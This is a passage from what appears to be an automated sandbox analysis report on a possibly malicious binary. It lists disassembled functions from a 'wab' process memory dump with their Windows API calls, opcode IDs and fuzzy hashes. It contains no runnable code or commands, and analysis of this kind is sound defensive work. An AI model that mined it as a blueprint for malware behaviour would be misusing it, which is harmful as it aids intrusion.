                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 159017214-0
                                                                                                                                                                                                                      • Opcode ID: ce19115a923a15add3814b7342b05fb50f984b43095f56e0ebc72410723b566f
                                                                                                                                                                                                                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce19115a923a15add3814b7342b05fb50f984b43095f56e0ebc72410723b566f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3150196962-0
                                                                                                                                                                                                                      • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                                                                      • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                      • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                      • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                                      • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: 3e003a951d4b795c2795be91072552c134f268f2eb67798ac8aad6e8ea3cca53
                                                                                                                                                                                                                      • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e003a951d4b795c2795be91072552c134f268f2eb67798ac8aad6e8ea3cca53
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040B0B5 Relevance: 3.0, APIs: 2, Instructions: 7COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: 10fc877065b6e48d7bdc99d18b4a7e13807bbdb0444c9cb367cecc131ffa056e
                                                                                                                                                                                                                      • Instruction ID: 93a37c1a4f050773dc1a5674df64ec50811fc8a39a1cc3e4a9db11821b00e242
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10fc877065b6e48d7bdc99d18b4a7e13807bbdb0444c9cb367cecc131ffa056e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0B012310281004DEB057BA1B8061142302C64332E3B3413FE000500A3DE5D6034140F
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmpmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1065087418-0
                                                                                                                                                                                                                      • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406C5A Relevance: 2.7, APIs: 2, Instructions: 184COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00406E09
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00406E5A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$??2@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3700833809-0
                                                                                                                                                                                                                      • Opcode ID: fbf9b295b5a7520f84bfa942b8c4279f7b3464a00728e86ce032f040724bd2e9
                                                                                                                                                                                                                      • Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbf9b295b5a7520f84bfa942b8c4279f7b3464a00728e86ce032f040724bd2e9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                                                                                      • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                                      • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1297977491-0
                                                                                                                                                                                                                      • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                                      • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                        • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1481295809-0
                                                                                                                                                                                                                      • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3150196962-0
                                                                                                                                                                                                                      • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                                                                                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4232544981-0
                                                                                                                                                                                                                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3859505661-0
                                                                                                                                                                                                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                      Download Yara Rule
